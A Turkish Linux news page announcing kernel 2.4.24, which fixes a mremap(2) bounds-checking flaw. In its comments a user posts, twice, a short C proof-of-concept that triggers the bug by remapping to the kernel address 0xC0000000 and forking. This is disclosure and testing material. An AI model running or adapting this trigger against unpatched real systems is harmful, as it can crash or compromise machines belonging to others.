Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

ODTÜ Bilgisayar Topluluğu IX. Geleneksel Programlama Yarışması
hayalci
20 Mart 2006, 5 dakika okuma süresi

ODTÜ Bilgisayar Topluluğu'nun düzenlediği Geleneksel Programlama Yarışması'nın dokuzuncusu için ön elemeler başladı. Finali 30 Nisan 2006'da yapılacak olan yarışmanın ön eleme sorularına ve yarışmayla ilgili detaylara http://yarisma.cclub.metu.edu.tr adresinden erişilebilir. Son cevap gönderme tarihi 20 Nisan 2006 olan ön eleme sorularının puanlandırılmasıyla seçilecek olan finalistler, 30 Nisan 2006 tarihinde ODTÜ Bilgisayar Mühendisliği Bölümü'nde yapılacak olan finale katılmaya hak kazanacaklar. Ayrıca finallerden bağımsız olarak özel ödüllü bir soru da tüm yarışmacılar tarafından cevaplanabilir. Finalde dereceye giren ve özel ödüllü sorudan en yüksek puan alan yarışmacılara finalle aynı gün düzenlenecek olan törende ödülleri verilecektir. Dünyadaki benzerleri arasında (IOI, ACM, Tübitak) Linux platformunda düzenlenmiş yarışmaların ilki olma ayrıcalığına sahip olan yarışmaya, bilgisayar bilimine ilgi duyan ve gönül veren tüm üniversite lisans öğrencileri davetlidir.

KDE 3.2 Alpha 1 çıktı!!
ghanthar
11 Eylül 2003, 1 dakika okuma süresi

Eylül ayı Linux Dünyasında Yeni Sürüm Ayı olarak bilinen aylardandır. Önce Mandrake, RedHat ve Suse (resmi bir açıklama yok ancak bazı FTP sunucularında yeni bir SuSE sürümünün ismi görülüyor) dağıtımlarının `BETA´ ları ardından yeni sürümün yaklaştığını haber veren OpenOffice.org 1.1 RC4 ve Gnome 2.4 derken şimdi de KDE 3.2´nin ilk ALPHA sürümü ile karşa karşıyayız. Kararlı sürüm ise Aralık ayı civarı masaüstümüzde olacak.

Kaynak:LinuxTurkey

SUSE Novell tarafından satın alındı!
sundance
4 Kasım 2003, 1 dakika okuma süresi

Dünyanın önde gelen IT firmalarından Novell, Ağustos ayında Ximian'ı satın almasının ardından bugün SUSE ile anlaşmaya vardığını açıkladı.

Böylelikle ilk defa milyar dolar seviyesinde sermayeye sahip bir firma kendi Linux dağıtımını geliştirip yaymaya başlayacak. Anlaşmanın bedeli olan 210 milyon doların mali yılın ilk çeyreği içinde SUSE'ye verilmesi bekleniyor.

Fedora Core 6 Duyuruldu
anonim
25 Ekim 2006, 1 dakika okuma süresi

Can sıkıcı birkaç hatanın giderilmesinin zaman alması nedeniyle çıkışı 2 defa ertelenen Fedora Core,planlanan tarih olan 16 Ekim'den 8 gün sonra 6. sürümünü az önce duyurdu.

Yılın Penguenleri Ödülleri için aday gösterme süreci başladı
dfisek
7 Nisan 2005, 1 dakika okuma süresi

Linux Kullanıcılari Derneği, her yıl olduğu gibi Yılın Penguenleri Ödulleri'ni veriyor. Geçen yıl olduğu gibi 6 kategoride verilecek olan ödüller, sizlerin göstereceğiniz adaylar arasından dernek üyeleri tarafından yapılacak oylama ile belirlenecek. [ Ayrıntılı Bilgi ]
Editörün notu: Şimdiden güzide editörümüz Emre "FZ" Sevinç, En Çalışkan Penguen, Fazlamesai.net televizyon programı da En İyi Basılı/Görsel İçerik Çalışması kategorilerinde aday gösterilmişler.